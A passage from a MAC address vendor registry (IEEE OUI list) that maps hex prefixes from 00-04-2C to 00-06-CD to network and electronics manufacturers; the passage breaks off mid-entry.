00-04-2C (hex) Minet, Inc. 00-04-2D (hex) Sarian Systems, Ltd. 00-04-2E (hex) Netous Technologies, Ltd. 00-04-2F (hex) International Communications Products, Inc. 00-04-30 (hex) Netgem 00-04-31 (hex) GlobalStreams, Inc. 00-04-32 (hex) Voyetra Turtle Beach, Inc. 00-04-33 (hex) Cyberboard A/S 00-04-34 (hex) Accelent Systems, Inc. 00-04-35 (hex) Comptek International, Inc. 00-04-36 (hex) ELANsat Technologies, Inc. 00-04-37 (hex) Powin Information Technology, Inc. 00-04-38 (hex) Nortel Networks 00-04-39 (hex) Rosco Entertainment Technology, Inc. 00-04-3A (hex) Intelligent Telecommunications, Inc. 00-04-3B (hex) Lava Computer Mfg., Inc. 00-04-3C (hex) SONOS Co., Ltd. 00-04-3D (hex) INDEL AG 00-04-3E (hex) Telencomm 00-04-3F (hex) ESTeem Wireless Modems, Inc 00-04-40 (hex) cyberPIXIE, Inc. 00-04-41 (hex) Half Dome Systems, Inc. 00-04-42 (hex) NACT 00-04-43 (hex) Agilent Technologies, Inc. 00-04-44 (hex) Western Multiplex Corporation 00-04-45 (hex) LMS Skalar Instruments GmbH 00-04-46 (hex) CYZENTECH Co., Ltd. 00-04-47 (hex) Acrowave Systems Co., Ltd. 00-04-48 (hex) Polaroid Corporation 00-04-49 (hex) Mapletree Networks 00-04-4A (hex) iPolicy Networks, Inc. 00-04-4B (hex) NVIDIA 00-04-4C (hex) JENOPTIK 00-04-4D (hex) Cisco Systems, Inc. 00-04-4E (hex) Cisco Systems, Inc. 00-04-4F (hex) Leukhardt Systemelektronik GmbH 00-04-50 (hex) DMD Computers SRL 00-04-51 (hex) Medrad, Inc. 00-04-52 (hex) RocketLogix, Inc. 00-04-53 (hex) YottaYotta, Inc. 00-04-54 (hex) Quadriga UK 00-04-55 (hex) ANTARA.net 00-04-56 (hex) Cambium Networks Limited 00-04-57 (hex) Universal Access Technology, Inc. 00-04-58 (hex) Fusion X Co., Ltd. 00-04-59 (hex) Veristar Corporation 00-04-5A (hex) The Linksys Group, Inc. 00-04-5B (hex) Techsan Electronics Co., Ltd. 00-04-5C (hex) Mobiwave Pte Ltd 00-04-5D (hex) BEKA Elektronik 00-04-5E (hex) PolyTrax Information Technology AG 00-04-5F (hex) Evalue Technology, Inc. 00-04-60 (hex) Knilink Technology, Inc. 00-04-61 (hex) EPOX Computer Co., Ltd. 00-04-62 (hex) DAKOS Data & Communication Co., Ltd. 00-04-63 (hex) Bosch Security Systems 00-04-64 (hex) Fantasma Networks, Inc. 00-04-65 (hex) i.s.t isdn-support technik GmbH 00-04-66 (hex) ARMITEL Co. 00-04-67 (hex) Wuhan Research Institute of MII 00-04-68 (hex) Vivity, Inc. 00-04-69 (hex) Innocom, Inc. 00-04-6A (hex) Navini Networks 00-04-6B (hex) Palm Wireless, Inc. 00-04-6C (hex) Cyber Technology Co., Ltd. 00-04-6D (hex) Cisco Systems, Inc. 00-04-6E (hex) Cisco Systems, Inc. 00-04-6F (hex) Digitel S/A Industria Eletronica 00-04-70 (hex) ipUnplugged AB 00-04-71 (hex) IPrad 00-04-72 (hex) Telelynx, Inc. 00-04-73 (hex) Photonex Corporation 00-04-74 (hex) LEGRAND 00-04-75 (hex) 3 Com Corporation 00-04-76 (hex) 3 Com Corporation 00-04-77 (hex) Scalant Systems, Inc. 00-04-78 (hex) G. Star Technology Corporation 00-04-79 (hex) Radius Co., Ltd. 00-04-7A (hex) AXXESSIT ASA 00-04-7B (hex) Schlumberger 00-04-7C (hex) Skidata AG 00-04-7D (hex) Pelco 00-04-7E (hex) Siqura B.V. 00-04-7F (hex) Chr. Mayr GmbH & Co. KG 00-04-80 (hex) Brocade Communications Systems, Inc 00-04-81 (hex) Econolite Control Products, Inc. 00-04-82 (hex) Medialogic Corp. 00-04-83 (hex) Deltron Technology, Inc. 00-04-84 (hex) Amann GmbH 00-04-85 (hex) PicoLight 00-04-86 (hex) ITTC, University of Kansas 00-04-87 (hex) Cogency Semiconductor, Inc. 00-04-88 (hex) Eurotherm Controls 00-04-89 (hex) YAFO Networks, Inc. 00-04-8A (hex) Temia Vertriebs GmbH 00-04-8B (hex) Poscon Corporation 00-04-8C (hex) Nayna Networks, Inc. 00-04-8D (hex) Tone Commander Systems, Inc. 00-04-8E (hex) Ohm Tech Labs, Inc. 00-04-8F (hex) TD Systems Corporation 00-04-90 (hex) Optical Access 00-04-91 (hex) Technovision, Inc. 00-04-92 (hex) Hive Internet, Ltd. 00-04-93 (hex) Tsinghua Unisplendour Co., Ltd. 00-04-94 (hex) Breezecom, Ltd. 00-04-95 (hex) Tejas Networks India Limited 00-04-96 (hex) Extreme Networks 00-04-97 (hex) MacroSystem Digital Video AG 00-04-98 (hex) Mahi Networks 00-04-99 (hex) Chino Corporation 00-04-9A (hex) Cisco Systems, Inc. 00-04-9B (hex) Cisco Systems, Inc. 00-04-9C (hex) Surgient Networks, Inc. 00-04-9D (hex) Ipanema Technologies 00-04-9E (hex) Wirelink Co., Ltd. 00-04-9F (hex) Freescale Semiconductor 00-04-A0 (hex) Verity Instruments, Inc. 00-04-A1 (hex) Pathway Connectivity 00-04-A2 (hex) L.S.I. Japan Co., Ltd. 00-04-A3 (hex) Microchip Technology, Inc. 00-04-A4 (hex) NetEnabled, Inc. 00-04-A5 (hex) Barco Projection Systems NV 00-04-A6 (hex) SAF Tehnika Ltd. 00-04-A7 (hex) FabiaTech Corporation 00-04-A8 (hex) Broadmax Technologies, Inc. 00-04-A9 (hex) SandStream Technologies, Inc. 00-04-AA (hex) Jetstream Communications 00-04-AB (hex) Comverse Network Systems, Inc. 00-04-AC (hex) IBM Corp 00-04-AD (hex) Malibu Networks 00-04-AE (hex) Sullair Corporation 00-04-AF (hex) Digital Fountain, Inc. 00-04-B0 (hex) ELESIGN Co., Ltd. 00-04-B1 (hex) Signal Technology, Inc. 00-04-B2 (hex) ESSEGI SRL 00-04-B3 (hex) Videotek, Inc. 00-04-B4 (hex) CIAC 00-04-B5 (hex) Equitrac Corporation 00-04-B6 (hex) Stratex Networks, Inc. 00-04-B7 (hex) AMB i.t. Holding 00-04-B8 (hex) Kumahira Co., Ltd. 00-04-B9 (hex) S.I. Soubou, Inc. 00-04-BA (hex) KDD Media Will Corporation 00-04-BB (hex) Bardac Corporation 00-04-BC (hex) Giantec, Inc. 00-04-BD (hex) Motorola Mobility, Inc. 00-04-BE (hex) OptXCon, Inc. 00-04-BF (hex) VersaLogic Corp. 00-04-C0 (hex) Cisco Systems, Inc. 00-04-C1 (hex) Cisco Systems, Inc. 00-04-C2 (hex) Magnipix, Inc. 00-04-C3 (hex) CASTOR Informatique 00-04-C4 (hex) Allen & Heath Limited 00-04-C5 (hex) ASE Technologies, USA 00-04-C6 (hex) Yamaha Motor Co., Ltd. 00-04-C7 (hex) NetMount 00-04-C8 (hex) LIBA Maschinenfabrik GmbH 00-04-C9 (hex) Micro Electron Co., Ltd. 00-04-CA (hex) FreeMs Corp. 00-04-CB (hex) Tdsoft Communication, Ltd. 00-04-CC (hex) Peek Traffic B.V. 00-04-CD (hex) Informedia Research Group 00-04-CE (hex) Patria Ailon 00-04-CF (hex) Seagate Technology 00-04-D0 (hex) Softlink s.r.o. 00-04-D1 (hex) Drew Technologies, Inc. 00-04-D2 (hex) Adcon Telemetry GmbH 00-04-D3 (hex) Toyokeiki Co., Ltd. 00-04-D4 (hex) Proview Electronics Co., Ltd. 00-04-D5 (hex) Hitachi Information & Communication Engineering, Ltd. 00-04-D6 (hex) Takagi Industrial Co., Ltd. 00-04-D7 (hex) Omitec Instrumentation Ltd. 00-04-D8 (hex) IPWireless, Inc. 00-04-D9 (hex) Titan Electronics, Inc. 00-04-DA (hex) Relax Technology, Inc. 00-04-DB (hex) Tellus Group Corp. 00-04-DC (hex) Nortel Networks 00-04-DD (hex) Cisco Systems, Inc. 00-04-DE (hex) Cisco Systems, Inc. 00-04-DF (hex) Teracom Telematica Ltda. 00-04-E0 (hex) Procket Networks 00-04-E1 (hex) Infinior Microsystems 00-04-E2 (hex) SMC Networks, Inc. 00-04-E3 (hex) Accton Technology Corp. 00-04-E4 (hex) Daeryung Ind., Inc. 00-04-E5 (hex) Glonet Systems, Inc. 00-04-E6 (hex) Banyan Network Private Limited 00-04-E7 (hex) Lightpointe Communications, Inc 00-04-E8 (hex) IER, Inc. 00-04-E9 (hex) Infiniswitch Corporation 00-04-EA (hex) Hewlett-Packard Company 00-04-EB (hex) Paxonet Communications, Inc. 00-04-EC (hex) Memobox SA 00-04-ED (hex) Billion Electric Co., Ltd. 00-04-EE (hex) Lincoln Electric Company 00-04-EF (hex) Polestar Corp. 00-04-F0 (hex) International Computers, Ltd 00-04-F1 (hex) WhereNet 00-04-F2 (hex) Polycom 00-04-F3 (hex) FS FORTH-SYSTEME GmbH 00-04-F4 (hex) Infinite Electronics Inc. 00-04-F5 (hex) SnowShore Networks, Inc. 00-04-F6 (hex) Amphus 00-04-F7 (hex) Omega Band, Inc. 00-04-F8 (hex) QUALICABLE TV Industria E Com., Ltda 00-04-F9 (hex) Xtera Communications, Inc. 00-04-FA (hex) NBS Technologies Inc. 00-04-FB (hex) Commtech, Inc. 00-04-FC (hex) Stratus Computer (DE), Inc. 00-04-FD (hex) Japan Control Engineering Co., Ltd. 00-04-FE (hex) Pelago Networks 00-04-FF (hex) Acronet Co., Ltd. 00-05-00 (hex) Cisco Systems, Inc. 00-05-01 (hex) Cisco Systems, Inc. 00-05-02 (hex) APPLE COMPUTER 00-05-03 (hex) ICONAG 00-05-04 (hex) Naray Information & Communication Enterprise 00-05-05 (hex) Systems Integration Solutions, Inc. 00-05-06 (hex) Reddo Networks AB 00-05-07 (hex) Fine Appliance Corp. 00-05-08 (hex) Inetcam, Inc. 00-05-09 (hex) AVOC Nishimura Ltd. 00-05-0A (hex) ICS Spa 00-05-0B (hex) SICOM Systems, Inc. 00-05-0C (hex) Network Photonics, Inc. 00-05-0D (hex) Midstream Technologies, Inc. 00-05-0E (hex) 3ware, Inc. 00-05-0F (hex) Tanaka S/S Ltd. 00-05-10 (hex) Infinite Shanghai Communication Terminals Ltd. 00-05-11 (hex) Complementary Technologies Ltd 00-05-12 (hex) MeshNetworks, Inc. 00-05-13 (hex) VTLinx Multimedia Systems, Inc. 00-05-14 (hex) KDT Systems Co., Ltd. 00-05-15 (hex) Nuark Co., Ltd. 00-05-16 (hex) SMART Modular Technologies 00-05-17 (hex) Shellcomm, Inc. 00-05-18 (hex) Jupiters Technology 00-05-19 (hex) Siemens Building Technologies AG, 00-05-1A (hex) 3Com Europe Ltd. 00-05-1B (hex) Magic Control Technology Corporation 00-05-1C (hex) Xnet Technology Corp. 00-05-1D (hex) Airocon, Inc. 00-05-1E (hex) Brocade Communications Systems, Inc. 00-05-1F (hex) Taijin Media Co., Ltd. 00-05-20 (hex) Smartronix, Inc. 00-05-21 (hex) Control Microsystems 00-05-22 (hex) LEA*D Corporation, Inc. 00-05-23 (hex) AVL List GmbH 00-05-24 (hex) BTL System (HK) Limited 00-05-25 (hex) Puretek Industrial Co., Ltd. 00-05-26 (hex) IPAS GmbH 00-05-27 (hex) SJ Tek Co. Ltd 00-05-28 (hex) New Focus, Inc. 00-05-29 (hex) Shanghai Broadan Communication Technology Co., Ltd 00-05-2A (hex) Ikegami Tsushinki Co., Ltd. 00-05-2B (hex) HORIBA, Ltd. 00-05-2C (hex) Supreme Magic Corporation 00-05-2D (hex) Zoltrix International Limited 00-05-2E (hex) Cinta Networks 00-05-2F (hex) Leviton Network Solutions 00-05-30 (hex) Andiamo Systems, Inc. 00-05-31 (hex) Cisco Systems, Inc. 00-05-32 (hex) Cisco Systems, Inc. 00-05-33 (hex) Brocade Communications Systems, Inc. 00-05-34 (hex) Northstar Engineering Ltd. Henley-on-Thames Oxon RG9 6AE 00-05-35 (hex) Chip PC Ltd. 00-05-36 (hex) Danam Communications, Inc. 00-05-37 (hex) Nets Technology Co., Ltd. 00-05-38 (hex) Merilus, Inc. 00-05-39 (hex) A Brand New World in Sweden AB 00-05-3A (hex) Willowglen Services Pte Ltd 00-05-3B (hex) Harbour Networks Ltd., Co. Beijing 00-05-3C (hex) Xircom 00-05-3D (hex) Agere Systems 00-05-3E (hex) KID Systeme GmbH 00-05-3F (hex) VisionTek, Inc. 00-05-40 (hex) FAST Corporation 00-05-41 (hex) Advanced Systems Co., Ltd. 00-05-42 (hex) Otari, Inc. 00-05-43 (hex) IQ Wireless GmbH 00-05-44 (hex) Valley Technologies, Inc. 00-05-45 (hex) Internet Photonics 00-05-46 (hex) KDDI Network & Solultions Inc. 00-05-47 (hex) Starent Networks 00-05-48 (hex) Disco Corporation 00-05-49 (hex) Salira Optical Network Systems 00-05-4A (hex) Ario Data Networks, Inc. 00-05-4B (hex) Eaton Automation AG 00-05-4C (hex) RF Innovations Pty Ltd 00-05-4D (hex) Brans Technologies, Inc. 00-05-4E (hex) Philips 00-05-4F (hex) PRIVATE 00-05-50 (hex) Vcomms Connect Limited 00-05-51 (hex) F & S Elektronik Systeme GmbH 00-05-52 (hex) Xycotec Computer GmbH 00-05-53 (hex) DVC Company, Inc. 00-05-54 (hex) Rangestar Wireless 00-05-55 (hex) Japan Cash Machine Co., Ltd. 00-05-56 (hex) 360 Systems 00-05-57 (hex) Agile TV Corporation 00-05-58 (hex) Synchronous, Inc. 00-05-59 (hex) Intracom S.A. 00-05-5A (hex) Power Dsine Ltd. 00-05-5B (hex) Charles Industries, Ltd. 00-05-5C (hex) Kowa Company, Ltd. 00-05-5D (hex) D-Link Systems, Inc. 00-05-5E (hex) Cisco Systems, Inc. 00-05-5F (hex) Cisco Systems, Inc. 00-05-60 (hex) LEADER COMM.CO., LTD 00-05-61 (hex) nac Image Technology, Inc. 00-05-62 (hex) Digital View Limited 00-05-63 (hex) J-Works, Inc. 00-05-64 (hex) Tsinghua Bitway Co., Ltd. 00-05-65 (hex) Tailyn Communication Company Ltd. 00-05-66 (hex) Secui.com Corporation 00-05-67 (hex) Etymonic Design, Inc. 00-05-68 (hex) Piltofish Networks AB 00-05-69 (hex) VMware, Inc. 00-05-6A (hex) Heuft Systemtechnik GmbH 00-05-6B (hex) C.P. Technology Co., Ltd. 00-05-6C (hex) Hung Chang Co., Ltd. 00-05-6D (hex) Pacific Corporation 00-05-6E (hex) National Enhance Technology, Inc. 00-05-6F (hex) Innomedia Technologies Pvt. Ltd. 00-05-70 (hex) Baydel Ltd. 00-05-71 (hex) Seiwa Electronics Co. 00-05-72 (hex) Deonet Co., Ltd. 00-05-73 (hex) Cisco Systems, Inc. 00-05-74 (hex) Cisco Systems, Inc. 00-05-75 (hex) CDS-Electronics BV 00-05-76 (hex) NSM Technology Ltd. 00-05-77 (hex) SM Information & Communication 00-05-78 (hex) PRIVATE 00-05-79 (hex) Universal Control Solution Corp. 00-05-7A (hex) Hatteras Networks 00-05-7B (hex) Chung Nam Electronic Co., Ltd. 00-05-7C (hex) RCO Security AB 00-05-7D (hex) Sun Communications, Inc. 00-05-7E (hex) Eckelmann Steuerungstechnik GmbH 00-05-7F (hex) Acqis Technology 00-05-80 (hex) Fibrolan Ltd. 00-05-81 (hex) Snell 00-05-82 (hex) ClearCube Technology 00-05-83 (hex) ImageCom Limited 00-05-84 (hex) AbsoluteValue Systems, Inc. 00-05-85 (hex) Juniper Networks, Inc. 00-05-86 (hex) Lucent Technologies 00-05-87 (hex) Locus, Incorporated 00-05-88 (hex) Sensoria Corp. 00-05-89 (hex) National Datacomputer 00-05-8A (hex) Netcom Co., Ltd. 00-05-8B (hex) IPmental, Inc. 00-05-8C (hex) Opentech Inc. 00-05-8D (hex) Lynx Photonic Networks, Inc. 00-05-8E (hex) Flextronics International GmbH & Co. Nfg. KG 00-05-8F (hex) CLCsoft co. 00-05-90 (hex) Swissvoice Ltd. 00-05-91 (hex) Active Silicon Ltd. 00-05-92 (hex) Pultek Corp. 00-05-93 (hex) Grammar Engine Inc. 00-05-94 (hex) IXXAT Automation GmbH 00-05-95 (hex) Alesis Corporation 00-05-96 (hex) Genotech Co., Ltd. 00-05-97 (hex) Eagle Traffic Control Systems 00-05-98 (hex) CRONOS S.r.l. 00-05-99 (hex) DRS Test and Energy Management or DRS-TEM 00-05-9A (hex) Cisco Systems, Inc. 00-05-9B (hex) Cisco Systems, Inc. 00-05-9C (hex) Kleinknecht GmbH, Ing. Buero 00-05-9D (hex) Daniel Computing Systems, Inc. 00-05-9E (hex) Zinwell Corporation 00-05-9F (hex) Yotta Networks, Inc. 00-05-A0 (hex) MOBILINE Kft. 00-05-A1 (hex) Zenocom 00-05-A2 (hex) CELOX Networks 00-05-A3 (hex) QEI, Inc. 00-05-A4 (hex) Lucid Voice Ltd. 00-05-A5 (hex) KOTT 00-05-A6 (hex) Extron Electronics 00-05-A7 (hex) Hyperchip, Inc. 00-05-A8 (hex) WYLE ELECTRONICS 00-05-A9 (hex) Princeton Networks, Inc. 00-05-AA (hex) Moore Industries International Inc. 00-05-AB (hex) Cyber Fone, Inc. 00-05-AC (hex) Northern Digital, Inc. 00-05-AD (hex) Topspin Communications, Inc. 00-05-AE (hex) Mediaport USA 00-05-AF (hex) InnoScan Computing A/S 00-05-B0 (hex) Korea Computer Technology Co., Ltd. 00-05-B1 (hex) ASB Technology BV 00-05-B2 (hex) Medison Co., Ltd. 00-05-B3 (hex) Asahi-Engineering Co., Ltd. 00-05-B4 (hex) Aceex Corporation 00-05-B5 (hex) Broadcom Technologies 00-05-B6 (hex) INSYS Microelectronics GmbH 00-05-B7 (hex) Arbor Technology Corp. 00-05-B8 (hex) Electronic Design Associates, Inc. 00-05-B9 (hex) Airvana, Inc. 00-05-BA (hex) Area Netwoeks, Inc. 00-05-BB (hex) Myspace AB 00-05-BC (hex) Resorsys Ltd. 00-05-BD (hex) ROAX BV 00-05-BE (hex) Kongsberg Seatex AS 00-05-BF (hex) JustEzy Technology, Inc. 00-05-C0 (hex) Digital Network Alacarte Co., Ltd. 00-05-C1 (hex) A-Kyung Motion, Inc. 00-05-C2 (hex) Soronti, Inc. 00-05-C3 (hex) Pacific Instruments, Inc. 00-05-C4 (hex) Telect, Inc. 00-05-C5 (hex) Flaga HF 00-05-C6 (hex) Triz Communications 00-05-C7 (hex) I/F-COM A/S 00-05-C8 (hex) VERYTECH 00-05-C9 (hex) LG Innotek Co., Ltd. 00-05-CA (hex) Hitron Technology, Inc. 00-05-CB (hex) ROIS Technologies, Inc. 00-05-CC (hex) Sumtel Communications, Inc. 00-05-CD (hex) Denon, Ltd. 00-05-CE (hex) Prolink Microsystems Corporation 00-05-CF (hex) Thunder River Technologies, Inc. 00-05-D0 (hex) Solinet Systems 00-05-D1 (hex) Metavector Technologies 00-05-D2 (hex) DAP Technologies 00-05-D3 (hex) eProduction Solutions, Inc. 00-05-D4 (hex) FutureSmart Networks, Inc. 00-05-D5 (hex) Speedcom Wireless 00-05-D6 (hex) Titan Wireless 00-05-D7 (hex) Vista Imaging, Inc. 00-05-D8 (hex) Arescom, Inc. 00-05-D9 (hex) Techno Valley, Inc. 00-05-DA (hex) Apex Automationstechnik 00-05-DB (hex) PSI Nentec GmbH 00-05-DC (hex) Cisco Systems, Inc. 00-05-DD (hex) Cisco Systems, Inc. 00-05-DE (hex) Gi Fone Korea, Inc. 00-05-DF (hex) Electronic Innovation, Inc. 00-05-E0 (hex) Empirix Corp. 00-05-E1 (hex) Trellis Photonics, Ltd. 00-05-E2 (hex) Creativ Network Technologies 00-05-E3 (hex) LightSand Communications, Inc. 00-05-E4 (hex) Red Lion Controls Inc. 00-05-E5 (hex) Renishaw PLC 00-05-E6 (hex) Egenera, Inc. 00-05-E7 (hex) Netrake an AudioCodes Company 00-05-E8 (hex) TurboWave, Inc. 00-05-E9 (hex) Unicess Network, Inc. 00-05-EA (hex) Rednix 00-05-EB (hex) Blue Ridge Networks, Inc. 00-05-EC (hex) Mosaic Systems Inc. 00-05-ED (hex) Technikum Joanneum GmbH 00-05-EE (hex) BEWATOR Group 00-05-EF (hex) ADOIR Digital Technology 00-05-F0 (hex) SATEC 00-05-F1 (hex) Vrcom, Inc. 00-05-F2 (hex) Power R, Inc. 00-05-F3 (hex) Weboyn 00-05-F4 (hex) System Base Co., Ltd. 00-05-F5 (hex) OYO Geospace 00-05-F6 (hex) Young Chang Co. Ltd. 00-05-F7 (hex) Analog Devices, Inc. 00-05-F8 (hex) Real Time Access, Inc. 00-05-F9 (hex) TOA Corporation 00-05-FA (hex) IPOptical, Inc. 00-05-FB (hex) ShareGate, Inc. 00-05-FC (hex) Schenck Pegasus Corp. 00-05-FD (hex) PacketLight Networks Ltd. 00-05-FE (hex) Traficon N.V. 00-05-FF (hex) SNS Solutions, Inc. 00-06-00 (hex) Toshiba Teli Corporation 00-06-01 (hex) Otanikeiki Co., Ltd. 00-06-02 (hex) Cirkitech Electronics Co. 00-06-03 (hex) Baker Hughes Inc. 00-06-04 (hex) @Track Communications, Inc. 00-06-05 (hex) Inncom International, Inc. 00-06-06 (hex) RapidWAN, Inc. 00-06-07 (hex) Omni Directional Control Technology Inc. 00-06-08 (hex) At-Sky SAS 00-06-09 (hex) Crossport Systems 00-06-0A (hex) Blue2space 00-06-0B (hex) Emerson Network Power 00-06-0C (hex) Melco Industries, Inc. 00-06-0D (hex) Wave7 Optics 00-06-0E (hex) IGYS Systems, Inc. 00-06-0F (hex) Narad Networks Inc 00-06-10 (hex) Abeona Networks Inc 00-06-11 (hex) Zeus Wireless, Inc. 00-06-12 (hex) Accusys, Inc. 00-06-13 (hex) Kawasaki Microelectronics Incorporated 00-06-14 (hex) Prism Holdings 00-06-15 (hex) Kimoto Electric Co., Ltd. 00-06-16 (hex) Tel Net Co., Ltd. 00-06-17 (hex) Redswitch Inc. 00-06-18 (hex) DigiPower Manufacturing Inc. 00-06-19 (hex) Connection Technology Systems 00-06-1A (hex) Zetari Inc. 00-06-1B (hex) Notebook Development Lab. Lenovo Japan Ltd. 00-06-1C (hex) Hoshino Metal Industries, Ltd. 00-06-1D (hex) MIP Telecom, Inc. 00-06-1E (hex) Maxan Systems 00-06-1F (hex) Vision Components GmbH 00-06-20 (hex) Serial System Ltd. 00-06-21 (hex) Hinox, Co., Ltd. 00-06-22 (hex) Chung Fu Chen Yeh Enterprise Corp. 00-06-23 (hex) MGE UPS Systems France 00-06-24 (hex) Gentner Communications Corp. 00-06-25 (hex) The Linksys Group, Inc. 00-06-26 (hex) MWE GmbH 00-06-27 (hex) Uniwide Technologies, Inc. 00-06-28 (hex) Cisco Systems, Inc. 00-06-29 (hex) IBM Corp 00-06-2A (hex) Cisco Systems, Inc. 00-06-2B (hex) INTRASERVER TECHNOLOGY 00-06-2C (hex) Bivio Networks 00-06-2D (hex) TouchStar Technologies, L.L.C. 00-06-2E (hex) Aristos Logic Corp. 00-06-2F (hex) Pivotech Systems Inc. 00-06-30 (hex) Adtranz Sweden 00-06-31 (hex) Optical Solutions, Inc. 00-06-32 (hex) Mesco Engineering GmbH 00-06-33 (hex) Cross Match Technologies GmbH 00-06-34 (hex) GTE Airfone Inc. 00-06-35 (hex) PacketAir Networks, Inc. 00-06-36 (hex) Jedai Broadband Networks 00-06-37 (hex) Toptrend-Meta Information (ShenZhen) Inc. 00-06-38 (hex) Sungjin C&C Co., Ltd. 00-06-39 (hex) Newtec 00-06-3A (hex) Dura Micro, Inc. 00-06-3B (hex) Arcturus Networks, Inc. 00-06-3C (hex) Intrinsyc Europe Ltd 00-06-3D (hex) Microwave Data Systems Inc. 00-06-3E (hex) Opthos Inc. 00-06-3F (hex) Everex Communications Inc. 00-06-40 (hex) White Rock Networks 00-06-41 (hex) ITCN 00-06-42 (hex) Genetel Systems Inc. 00-06-43 (hex) SONO Computer Co., Ltd. 00-06-44 (hex) Neix,Inc 00-06-45 (hex) Meisei Electric Co. Ltd. 00-06-46 (hex) ShenZhen XunBao Network Technology Co Ltd 00-06-47 (hex) Etrali S.A. 00-06-48 (hex) Seedsware, Inc. 00-06-49 (hex) 3M Deutschland GmbH 00-06-4A (hex) Honeywell Co., Ltd. (KOREA) 00-06-4B (hex) Alexon Co., Ltd. 00-06-4C (hex) Invicta Networks, Inc. 00-06-4D (hex) Sencore 00-06-4E (hex) Broad Net Technology Inc. 00-06-4F (hex) PRO-NETS Technology Corporation 00-06-50 (hex) Tiburon Networks, Inc. 00-06-51 (hex) Aspen Networks Inc. 00-06-52 (hex) Cisco Systems, Inc. 00-06-53 (hex) Cisco Systems, Inc. 00-06-54 (hex) Winpresa Building Automation Technologies GmbH 00-06-55 (hex) Yipee, Inc. 00-06-56 (hex) Tactel AB 00-06-57 (hex) Market Central, Inc. 00-06-58 (hex) Helmut Fischer GmbH Institut für Elektronik und Messtechnik 00-06-59 (hex) EAL (Apeldoorn) B.V. 00-06-5A (hex) Strix Systems 00-06-5B (hex) Dell Computer Corp. 00-06-5C (hex) Malachite Technologies, Inc. 00-06-5D (hex) Heidelberg Web Systems 00-06-5E (hex) Photuris, Inc. 00-06-5F (hex) ECI Telecom - NGTS Ltd. 00-06-60 (hex) NADEX Co., Ltd. 00-06-61 (hex) NIA Home Technologies Corp. 00-06-62 (hex) MBM Technology Ltd. 00-06-63 (hex) Human Technology Co., Ltd. 00-06-64 (hex) Fostex Corporation 00-06-65 (hex) Sunny Giken, Inc. 00-06-66 (hex) Roving Networks 00-06-67 (hex) Tripp Lite 00-06-68 (hex) Vicon Industries Inc. 00-06-69 (hex) Datasound Laboratories Ltd 00-06-6A (hex) InfiniCon Systems, Inc. 00-06-6B (hex) Sysmex Corporation 00-06-6C (hex) Robinson Corporation 00-06-6D (hex) Compuprint S.P.A. 00-06-6E (hex) Delta Electronics, Inc. 00-06-6F (hex) Korea Data Systems 00-06-70 (hex) Upponetti Oy 00-06-71 (hex) Softing AG 00-06-72 (hex) Netezza 00-06-73 (hex) TKH Security Solutions USA 00-06-74 (hex) Spectrum Control, Inc. 00-06-75 (hex) Banderacom, Inc. 00-06-76 (hex) Novra Technologies Inc. 00-06-77 (hex) SICK AG 00-06-78 (hex) Marantz Brand Company 00-06-79 (hex) Konami Corporation 00-06-7A (hex) JMP Systems 00-06-7B (hex) Toplink C&C Corporation 00-06-7C (hex) CISCO SYSTEMS, INC. 00-06-7D (hex) Takasago Ltd. 00-06-7E (hex) WinCom Systems, Inc. 00-06-7F (hex) Digeo, Inc. 00-06-80 (hex) Card Access, Inc. 00-06-81 (hex) Goepel Electronic GmbH 00-06-82 (hex) Convedia 00-06-83 (hex) Bravara Communications, Inc. 00-06-84 (hex) Biacore AB 00-06-85 (hex) NetNearU Corporation 00-06-86 (hex) ZARDCOM Co., Ltd. 00-06-87 (hex) Omnitron Systems Technology, Inc. 00-06-88 (hex) Telways Communication Co., Ltd. 00-06-89 (hex) yLez Technologies Pte Ltd 00-06-8A (hex) NeuronNet Co. Ltd. R&D Center 00-06-8B (hex) AirRunner Technologies, Inc. 00-06-8C (hex) 3Com Corporation 00-06-8D (hex) SEPATON, Inc. 00-06-8E (hex) HID Corporation 00-06-8F (hex) Telemonitor, Inc. 00-06-90 (hex) Euracom Communication GmbH 00-06-91 (hex) PT Inovacao 00-06-92 (hex) Intruvert Networks, Inc. 00-06-93 (hex) Flexus Computer Technology, Inc. 00-06-94 (hex) Mobillian Corporation 00-06-95 (hex) Ensure Technologies, Inc. 00-06-96 (hex) Advent Networks 00-06-97 (hex) R & D Center 00-06-98 (hex) egnite Software GmbH 00-06-99 (hex) Vida Design Co. 00-06-9A (hex) e & Tel 00-06-9B (hex) AVT Audio Video Technologies GmbH 00-06-9C (hex) Transmode Systems AB 00-06-9D (hex) Petards Ltd 00-06-9E (hex) UNIQA, Inc. 00-06-9F (hex) Kuokoa Networks 00-06-A0 (hex) Mx Imaging 00-06-A1 (hex) Celsian Technologies, Inc. 00-06-A2 (hex) Microtune, Inc. 00-06-A3 (hex) Bitran Corporation 00-06-A4 (hex) INNOWELL Corp. 00-06-A5 (hex) PINON Corp. 00-06-A6 (hex) Artistic Licence (UK) Ltd 00-06-A7 (hex) Primarion 00-06-A8 (hex) KC Technology, Inc. 00-06-A9 (hex) Universal Instruments Corp. 00-06-AA (hex) VT Miltope 00-06-AB (hex) W-Link Systems, Inc. 00-06-AC (hex) Intersoft Co. 00-06-AD (hex) KB Electronics Ltd. 00-06-AE (hex) Himachal Futuristic Communications Ltd 00-06-AF (hex) Xalted Networks 00-06-B0 (hex) Comtech EF Data Corp. 00-06-B1 (hex) Sonicwall 00-06-B2 (hex) Linxtek Co. 00-06-B3 (hex) Diagraph Corporation 00-06-B4 (hex) Vorne Industries, Inc. 00-06-B5 (hex) Source Photonics, Inc. 00-06-B6 (hex) Nir-Or Israel Ltd. 00-06-B7 (hex) TELEM GmbH 00-06-B8 (hex) Bandspeed Pty Ltd 00-06-B9 (hex) A5TEK Corp. 00-06-BA (hex) Westwave Communications 00-06-BB (hex) ATI Technologies Inc. 00-06-BC (hex) Macrolink, Inc. 00-06-BD (hex) BNTECHNOLOGY Co., Ltd. 00-06-BE (hex) Baumer Optronic GmbH 00-06-BF (hex) Accella Technologies Co., Ltd. 00-06-C0 (hex) United Internetworks, Inc. 00-06-C1 (hex) CISCO SYSTEMS, INC. 00-06-C2 (hex) Smartmatic Corporation 00-06-C3 (hex) Schindler Elevator Ltd. 00-06-C4 (hex) Piolink Inc. 00-06-C5 (hex) INNOVI Technologies Limited 00-06-C6 (hex) lesswire AG 00-06-C7 (hex) RFNET Technologies Pte Ltd (S) 00-06-C8 (hex) Sumitomo Metal Micro Devices, Inc. 00-06-C9 (hex) Technical Marketing Research, Inc. 00-06-CA (hex) American Computer & Digital Components, Inc. (ACDC) 00-06-CB (hex) Jotron Electronics A/S 00-06-CC (hex) JMI Electronics Co., Ltd. 00-06-CD 